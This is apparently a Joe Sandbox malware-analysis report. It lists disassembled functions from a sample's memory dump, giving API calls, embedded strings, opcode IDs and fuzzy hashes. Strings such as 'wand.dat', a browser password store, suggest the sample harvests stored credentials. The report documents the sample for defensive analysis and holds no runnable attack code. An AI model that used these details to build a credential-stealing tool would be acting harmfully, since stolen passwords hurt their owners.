                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131475296-0
                                                                                                                                                • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                • String ID: General
                                                                                                                                                • API String ID: 999786162-26480598
                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
